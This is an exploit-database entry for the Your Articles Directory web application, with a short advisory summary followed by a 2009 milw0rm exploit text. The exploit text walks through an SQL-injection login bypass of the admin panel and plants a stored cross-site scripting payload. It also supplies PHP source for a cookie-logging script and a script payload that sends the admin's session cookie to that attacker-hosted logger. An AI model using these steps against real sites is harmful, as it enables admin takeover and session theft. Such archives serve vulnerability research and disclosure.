Authentication Bypass and Cross Site Scripting Vulnerability in Your Articles Directory

vendor:

Your Articles Directory

by:

Egy Coders Team Researcher

8,8

CVSS

HIGH

Authentication Bypass and Cross Site Scripting

CWE

Product Name: Your Articles Directory

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Web

2020

Authentication Bypass and Cross Site Scripting Vulnerability in Your Articles Directory

A vulnerability exists in Your Articles Directory which allows an attacker to bypass authentication and inject malicious JavaScript code into the application. An attacker can exploit this vulnerability by sending a crafted request to the application with a malicious JavaScript code in the title and content fields. If the admin visits the page, the malicious JavaScript code will be executed and the admin's cookie will be sent to the attacker's server.

Mitigation:

The application should validate user input and filter out any malicious code. The application should also use a secure authentication mechanism to prevent unauthorized access.

Source

Exploit-DB raw data:

  ___ ___         __                        
 /   |   \_____  |  | _____  ___ ___________
/    ~    \__  \ |  |/ /\  \/  // __ \_  __ \
\    Y    // __ \|    <  >    <\  ___/|  | \/
 \___|_  /(____  /__|_ \/__/\_ \\___  >__|  
       \/      \/     \/      \/    \/   :: Egy Coders Team Researcher
/- Your Article Directory => multiple vulnerabilities
/- site : http://www.yourarticlesdirectory.com
/- Demo : http://www.ezynearticles.com/designs/demo/yad-admin
/- Greetz : all my friends
/- http://hakxer.blogspot.com/

* hi every body
* in this vulnerability you can get Authentication to bypass admin panel
* first go to http://host/path/yad-admin/
* and in admin type
 * username : admin 'or' 1=1
 * password : hakxer
* now we in panel
* you can make a cross site scripting vulnerability in panel
* go to http://host/path/yad-admin/newpage.php
* then in title write anything and in content write
 * >"<script>alert("hakxer")</script><div style="1
* and click save page and go to http://host/path/yad-admin/pages.php
* and goto this http://host/path/yad-admin/newpages.php?id=[id]
* xss was running successfully

* if you want to get the admin cookie
* you can use cookie grabber and to make it you can see this steps :
         * first make file ( logger.php ) and input this code in it
              <?php
            $cookie = $_GET['cookie'];
            $logger = fopen("logger.txt", "a");
            fwrite($logger, $cookie ."\n");
            fclose($logger);
            ?>
         * and upload file into any webhost
         * then create logger.txt and chmod it to 777
         * now the time to attack
         * goto http://host/path/yad-admin/newpage.php
         * and in title write ( blah blah come admin ) :d
         * and in content write this js code
    <script>document.location ="http://host/path/logger.php?cookie=" + document.cookie;</script>
         * and click save page
         * now if admin go to our saved page the cookie will send to logger.txt

** notes :
        ** use it in your own risk
       
./be safe - Hakxer -

# milw0rm.com [2009-05-21]